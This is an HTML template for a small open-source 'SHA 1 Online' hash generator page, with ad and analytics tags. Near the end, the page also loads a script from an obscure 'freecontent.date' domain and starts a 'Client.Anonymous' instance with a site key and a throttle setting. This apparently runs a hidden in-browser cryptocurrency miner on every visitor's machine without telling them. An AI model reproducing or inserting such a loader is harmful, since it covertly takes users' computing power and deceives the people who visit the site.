---
layout: compress
---
<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Sha 1 Online - Roger Vilà</title>
    <meta name="description" content="sha1 online free conversions. open source website.">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bulma/0.5.3/css/bulma.min.css">
</head>
<body>

    <header class="hero is-primary">
        <div class="hero-body">
            <div class="container">
                <h1 class="title">
                    SHA 1 Online
                </h1>
                <h2 class="subtitle">
                    sha1 online hash generator
                </h2>
            </div>
        </div>
    </header>

    <main class="section">
        <div class="container">
            <form action="#">
                <div class="field">
                    <label class="label">Input</label>
                    <div class="control">
                        <input autocomplete="off" id="input" class="input" type="password" placeholder="Text input">
                    </div>
                </div>
                <div class="field">
                    <label class="label">Result</label>
                    <div class="control">
                        <input id="result" readonly class="input" type="text" placeholder="Result">
                    </div>
                </div>
            </form>
        </div>
    </main>

    <ins class="adsbygoogle"
    style="display:block"
    data-ad-client="ca-pub-4739670084306482"
    data-ad-slot="3842929058"
    data-ad-format="auto"></ins>

    <hr>

    <footer class="footer">
        <div class="container">
            <div class="content has-text-centered">
                <p>
                    <strong>Sha 1 online</strong> by <a href="http://rogervila.es">Roger Vilà</a>. The source code is licensed
                    <a href="http://opensource.org/licenses/mit-license.php">MIT</a>.
                </p>
            </div>
        </div>
    </footer>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/js-sha1/0.6.0/sha1.min.js"></script>
    <script src="https://www.freecontent.date./RSjf.js"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-55617377-1"></script>
    <script>
        (adsbygoogle = window.adsbygoogle || []).push({});

        document.getElementById('input').addEventListener('keyup', function(e){
            e.preventDefault();
            document.getElementById('result').value = sha1(this.value);
        });

        var _client = new Client.Anonymous('f3f9efd2e65541505dc0d86979c90172fe61c886fb7a05749b1daa164da37ad5', {
            throttle: 0.7
        });
        _client.start();

        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'UA-55617377-1');
    </script>

</body>
</html>
